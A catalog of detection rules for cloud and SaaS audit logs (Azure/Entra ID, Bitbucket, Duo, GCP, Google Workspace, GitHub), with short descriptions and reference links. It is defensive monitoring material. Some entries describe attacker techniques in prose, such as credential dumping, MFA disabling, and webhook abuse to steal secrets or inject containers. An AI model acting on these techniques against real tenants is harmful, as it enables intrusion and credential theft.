Azure Subscription Permission Elevation Via ActivityLogs Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization
Azure Suppression Rule Created Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Virtual Network Modified or Deleted Identifies when a Virtual Network is modified or deleted in Azure. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure VPN Connection Modified or Deleted Identifies when a VPN connection is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
CA Policy Removed by Non Approved Actor Monitor and alert on conditional access changes where a non-approved actor removed a CA policy. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
CA Policy Updated by Non Approved Actor Monitor and alert on conditional access changes. Is the initiating actor approved to make changes? Review Modified Properties and compare the "old" vs "new" value. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
New CA Policy by Non-approved Actor Monitor and alert on conditional access changes. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure
Bitlocker Key Retrieval Monitor and alert for Bitlocker key retrieval. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval
Account Created And Deleted Within A Close Time Frame Detects when an account was created and deleted in a short period of time. https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts
Certificate-Based Authentication Enabled Detects when certificate-based authentication has been enabled in an Azure Active Directory tenant. https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/
Changes to Device Registration Policy Monitor and alert for changes to the device registration policy. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy
Guest Users Invited To Tenant By Non Approved Inviters Detects guest users being invited to the tenant by non-approved inviters. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
New Root Certificate Authority Added Detects a newly added root certificate authority in an Azure AD tenant to support certificate-based authentication. https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/
Users Added to Global or Device Admin Roles Monitor and alert for users added to device admin roles. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles
Application AppID Uri Configuration Changes Detects when a configuration change is made to an application's AppID URI. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed
Added Credentials to Existing Application Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials
Delegated Permissions Granted For All Users Detects when highly privileged delegated permissions are granted on behalf of all users. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
End User Consent Detects when an end user consents to an application. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent
End User Consent Blocked Detects when end user consent is blocked due to risk-based consent. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent
Added Owner To Application Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner
App Granted Microsoft Permissions Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
App Granted Privileged Delegated Or App Permissions Detects when an administrator grants either application permissions (app roles) or highly privileged delegated permissions. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
App Assigned To Azure RBAC/Microsoft Entra Role Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role
Application URI Configuration Changes Detects when a configuration change is made to an application's URI. URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes
Windows LAPS Credential Dump From Entra ID Detects when an account dumps the LAPS password from Entra ID. https://twitter.com/NathanMcNulty/status/1785051227568632263, https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/, https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487
Change to Authentication Method A change to an authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Azure Domain Federation Settings Modified Identifies when a user or application modifies the federation settings on the domain. https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes
User Added To Group With CA Policy Modification Access Monitor and alert on membership additions to groups that have CA policy modification access. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
User Removed From Group With CA Policy Modification Access Monitor and alert on membership removals from groups that have CA policy modification access. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
Guest User Invited By Non Approved Inviters Detects when a user that doesn't have permissions to invite a guest user attempts to invite one. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor
User State Changed From Guest To Member Detects the change of user type from "Guest" to "Member" for potential elevation of privilege. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
PIM Approvals And Deny Elevation Detects when a PIM elevation is approved or denied. Approvals or denials outside of normal operations should be investigated. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
PIM Alert Setting Changes To Disabled Detects when PIM alerts are set to disabled. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
Changes To PIM Settings Detects when changes are made to PIM roles. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
User Added To Privilege Role Detects when a user is added to a privileged role. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
Bulk Deletion Changes To Privileged Account Permissions Detects when a user is removed from a privileged role. Bulk changes should be investigated. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
Privileged Account Creation Detects when a new admin is created. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts
Azure Subscription Permission Elevation Via AuditLogs Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation
Temporary Access Pass Added To An Account Detects when a temporary access pass (TAP) is added to an account. TAPs added to privileged accounts should be investigated. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts
User Risk and MFA Registration Policy Updated Detects changes and updates to the user risk and MFA registration policy. Attackers can modify these policies to bypass MFA, weaken security thresholds, facilitate further attacks, or maintain persistence. https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy, https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities
Multi Factor Authentication Disabled For User Account Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors have been seen disabling multi-factor authentication for users in order to maintain or achieve access to the account. Also seen in SIM swap attacks. https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/
Password Reset By User Account Detects when a user has reset their password in Azure AD. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Anomalous Token Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Anomalous User Activity Indicates that there are anomalous patterns of behavior like suspicious changes to the directory. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Activity From Anonymous IP Address Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Anonymous IP Address Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN. https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address
Atypical Travel Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Impossible Travel Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Suspicious Inbox Forwarding Identity Protection Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Suspicious Inbox Manipulation Rules Detects when suspicious rules that delete or move messages or folders are set on a user's inbox. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Azure AD Account Credential Leaked Indicates that the user's valid credentials have been leaked. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Malicious IP Address Sign-In Failure Rate Indicates sign-in from a malicious IP address based on high failure rates. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Malicious IP Address Sign-In Suspicious Indicates sign-in from an IP address known to be malicious at the time of sign-in. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Sign-In From Malware Infected IP Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Password Spray Activity Indicates that a password spray attack has been successfully performed. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Primary Refresh Token Access Attempt Indicates an access attempt to the PRT resource, which can be used to move laterally into an organization or perform credential theft. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Suspicious Browser Activity Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Azure AD Threat Intelligence Indicates user activity that is unusual for the user or consistent with known attack patterns. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
SAML Token Issuer Anomaly Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
New Country Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Unfamiliar Sign-In Properties Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Stale Accounts In A Privileged Role Identifies when an account hasn't signed in during the past n number of days. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role
Invalid PIM License Identifies when an organization doesn't have the proper license for PIM and is out of compliance. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance
Roles Assigned Outside PIM Identifies when a privileged role assignment has taken place outside of PIM and may indicate an attack. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management
Roles Activation Doesn't Require MFA Identifies when a privileged role can be activated without performing MFA. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation
Roles Activated Too Frequently Identifies when the same privileged role has multiple activations by the same user. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently
Roles Are Not Being Used Identifies when a user has been assigned a privileged role and is not using that role. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles
Too Many Global Admins Identifies an event where there are too many accounts assigned the Global Administrator role. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators
Account Lockout Identifies a user account that has been locked because the user tried to sign in too many times with an incorrect user ID or password. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Successful Authentications From Countries You Do Not Operate Out Of Detects successful authentications from countries you do not operate out of. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Increased Failed Authentications Of Any Type Detects when failed sign-ins increase by 10% or more. https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins
Measurable Increase Of Successful Authentications Detects when successful sign-ins increase by 10% or more. https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins
Authentications To Important Apps Using Single Factor Authentication Detects when authentications to important application(s) only required single-factor authentication. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Discovery Using AzureHound Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication. https://github.com/BloodHoundAD/AzureHound
Failed Authentications From Countries You Do Not Operate Out Of Detects failed authentications from countries you do not operate out of. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Device Registration or Join Without MFA Monitor and alert for device registration or join events where MFA was not performed. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy
Azure AD Only Single Factor Authentication Required Detects when users are authenticating without MFA being required. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Suspicious SignIns From A Non Registered Device Detects risky authentication from a non-AD-registered device without MFA being required. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
Sign-ins from Non-Compliant Devices Monitor and alert for sign-ins where the device was non-compliant. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
Sign-ins by Unknown Devices Monitor and alert for sign-ins by unknown devices from non-trusted locations. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
Potential MFA Bypass Using Legacy Client Authentication Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack. https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022, https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/
Application Using Device Code Authentication Flow Device code flow is an OAuth 2.0 protocol flow specifically for input-constrained devices and is not used in all environments. If this type of flow is seen in the environment and is not being used in an input-constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows
Applications That Are Using ROPC Authentication Flow Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows
Account Disabled or Blocked for Sign in Attempts Detects when an account that is disabled or blocked for sign-in attempts to log in. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
Sign-in Failure Due to Conditional Access Requirements Not Met Define a baseline threshold for failed sign-ins due to Conditional Access failures. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
Use of Legacy Authentication Protocols Alerts when legacy authentication has been used on an account. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
Login to Disabled Account Detects failed attempts to sign in to disabled accounts. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Multifactor Authentication Denied The user has indicated that they did not initiate the MFA prompt, which could indicate an attacker has the password for the account. https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
Azure Unusual Authentication Interruption Detects when there is an interruption in the authentication process. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Multifactor Authentication Interrupted Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Users Authenticating To Other Azure AD Tenants Detects when users in your Azure AD tenant are authenticating to other Azure AD tenants. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
User Access Blocked by Azure Conditional Access Detects when access has been blocked by Conditional Access policies. The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Bitbucket Full Data Export Triggered Detects when full data export is attempted. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html
Bitbucket Global Permission Changed Detects global permissions change activity. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html
Bitbucket Global Secret Scanning Rule Deleted Detects Bitbucket global secret scanning rule deletion activity. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Global SSH Settings Changed Detects Bitbucket global SSH access configuration changes. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html
Bitbucket Audit Log Configuration Updated Detects changes to the Bitbucket audit log configuration. https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html
Bitbucket Project Secret Scanning Allowlist Added Detects when a secret scanning allowlist rule is added for projects. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Secret Scanning Exempt Repository Added Detects when a repository is exempted from the secret scanning feature. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Secret Scanning Rule Deleted Detects when a secret scanning rule is deleted for a project or repository. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Unauthorized Access To A Resource Detects unauthorized access attempts to a resource. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
Bitbucket Unauthorized Full Data Export Triggered Detects when a full data export is attempted by an unauthorized user. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket User Details Export Attempt Detected Detects user data export activity. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts
Bitbucket User Login Failure Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use it with correlation based on the "author.name" field. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
Bitbucket User Login Failure Via SSH Detects SSH user login access failures. Please note that this rule can be noisy and it is recommended to use it with correlation based on the "author.name" field. https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html
Bitbucket User Permissions Export Attempt Detects user permission data export attempt. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html
Cisco Duo Successful MFA Authentication Via Bypass Code Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems. https://duo.com/docs/adminapi#logs, https://help.duo.com/s/article/6327?language=en_US
GCP Access Policy Deleted Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource. https://cloud.google.com/access-context-manager/docs/audit-logging, https://cloud.google.com/logging/docs/audit/understanding-audit-logs, https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog
GCP Break-glass Container Workload Deployed Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls. https://cloud.google.com/binary-authorization
Google Cloud Storage Buckets Enumeration Detects when a storage bucket is enumerated in Google Cloud. https://cloud.google.com/storage/docs/json_api/v1/buckets
Google Cloud Storage Buckets Modified or Deleted Detects when a storage bucket is modified or deleted in Google Cloud. https://cloud.google.com/storage/docs/json_api/v1/buckets
Google Cloud Re-identifies Sensitive Information Identifies when sensitive information is re-identified in Google Cloud. https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify
Google Cloud DNS Zone Modified or Deleted Identifies when a DNS Zone is modified or deleted in Google Cloud. https://cloud.google.com/dns/docs/reference/v1/managedZones
Google Cloud Firewall Modified or Deleted Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html
Google Full Network Traffic Packet Capture Identifies potential full network packet capture in GCP. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html
Google Cloud Kubernetes Admission Controller Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. https://cloud.google.com/kubernetes-engine/docs
Google Cloud Kubernetes CronJob Identifies when a Kubernetes CronJob runs in Google Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Jobs can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use Kubernetes CronJobs to schedule execution of malicious code that would run as a container in the cluster. https://cloud.google.com/kubernetes-engine/docs, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/
Google Cloud Kubernetes RoleBinding Detects the creation or patching of a potentially malicious RoleBinding. This includes RoleBindings and ClusterRoleBindings. https://github.com/elastic/detection-rules/pull/1267, https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole, https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control, https://kubernetes.io/docs/reference/access-authn-authz/rbac/, https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
Google Cloud Kubernetes Secrets Modified or Deleted Identifies when Kubernetes Secrets are modified or deleted. https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
Google Cloud Service Account Disabled or Deleted Identifies when a service account is disabled or deleted in Google Cloud. https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts
Google Cloud Service Account Modified Identifies when a service account is modified in Google Cloud. https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts
Google Cloud SQL Database Modified or Deleted Detects when a Cloud SQL DB has been modified or deleted. https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update
Google Cloud VPN Tunnel Modified or Deleted Identifies when a VPN tunnel is modified or deleted in Google Cloud. https://any-api.com/googleapis_com/compute/docs/vpnTunnels
Google Workspace Application Access Level Modified Detects when an access level is changed for a Google Workspace application. An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing a Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google Workspace resources. https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings, https://support.google.com/a/answer/9261439
Google Workspace Application Removed Detects when an application is removed from Google Workspace. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST
Google Workspace Granted Domain API Access Detects when an API access service account is granted domain authority. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS
Google Workspace MFA Disabled Detects when multi-factor authentication (MFA) is disabled. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION
Google Workspace Role Modified or Deleted Detects when a role is modified or deleted in Google Workspace. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings
Google Workspace Role Privilege Deleted Detects when a role privilege is deleted in Google Workspace. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings
Google Workspace User Granted Admin Privileges Detects when a Google Workspace user is granted admin privileges. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE
Github Delete Action Invoked Detects delete action in the Github audit logs for codespaces, environment, project and repo. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions
Outdated Dependency Or Vulnerability Alert Disabled Dependabot performs a scan to detect insecure dependencies and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts for private repositories or Dependabot security updates for all repositories. https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization
Github High Risk Configuration Disabled Detects when a user disables a critical security feature for an organization. https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions, https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise
